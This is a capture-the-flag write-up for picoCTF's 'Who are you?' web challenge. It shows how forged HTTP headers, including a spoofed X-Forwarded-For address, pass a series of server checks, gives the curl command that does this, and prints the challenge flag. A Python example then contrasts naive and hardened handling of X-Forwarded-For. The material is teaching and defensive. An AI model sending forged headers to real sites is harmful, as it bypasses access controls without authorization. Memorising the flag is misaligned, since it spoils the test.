Who are you?

Points: 100

Description

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/

Hints

It ain’t much, but it’s an RFC https://tools.ietf.org/html/rfc2616

Solution

At first, the page shows a hint: use PicoBrowser

User-Agent: PicoBrowser

I don’t trust users visiting from another site.

Referer: http://mercury.picoctf.net:38322/

Sorry, this site only worked in 2018.

Date: 2018

I don’t trust users who can be tracked.

DNT: 1

This website is only for people from Sweden.

X-Forwarded-For: 2.16.66.0

You’re in Sweden but you don’t speak Swedish?

Accept-Language: sv

What can I say except, you are welcome

Use curl to modify the request headers, then send the request to get the flag.

curl 'http://mercury.picoctf.net:38322/' \
--header 'User-Agent: PicoBrowser' \
--header 'Referer: http://mercury.picoctf.net:38322/' \
--header 'Date: 2018' \
--header 'DNT: 1' \
--header 'X-Forwarded-For: 2.16.66.0' \
--header 'Accept-Language: sv'

flag: picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}
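
Every check the server made above reads a header the client sets, which is why the curl command passes them all. As an added example (not part of the original writeup or the challenge's code), here is the X-Forwarded-For check written in its weak form and then hardened, assuming a hypothetical deployment behind reverse proxies in 10.0.0.0/8; the function names, proxy range and sample addresses are constructed.

```python
import ipaddress

# Assumption: reverse proxies we operate live in this range (constructed value).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def naive_client_ip(peer_ip, headers):
    """Weak form: believe the first X-Forwarded-For entry, whoever sent it."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip

def _is_trusted(ip):
    # Raises ValueError if ip is not a valid address.
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_PROXIES)

def hardened_client_ip(peer_ip, headers):
    """Use X-Forwarded-For only when the socket peer is one of our proxies,
    and read it right to left so client-supplied entries are never believed."""
    if not _is_trusted(peer_ip):
        return peer_ip  # direct connection: the header is client-controlled
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not _is_trusted(hop):
                return hop  # first hop we do not operate is the real client
        except ValueError:
            return peer_ip  # malformed entry: fall back to the socket peer
    return peer_ip

# Constructed request: the headers from the curl command above, arriving
# directly from 203.0.113.7 (a documentation address, not a real client).
SPOOFED = {
    "User-Agent": "PicoBrowser",
    "Referer": "http://mercury.picoctf.net:38322/",
    "Date": "2018",
    "DNT": "1",
    "X-Forwarded-For": "2.16.66.0",
    "Accept-Language": "sv",
}

if __name__ == "__main__":
    print("naive:   ", naive_client_ip("203.0.113.7", SPOOFED))
    print("hardened:", hardened_client_ip("203.0.113.7", SPOOFED))
```

The other headers in the request (User-Agent, Referer, Date, DNT, Accept-Language) have no trusted-proxy equivalent, so they can inform presentation but not access decisions.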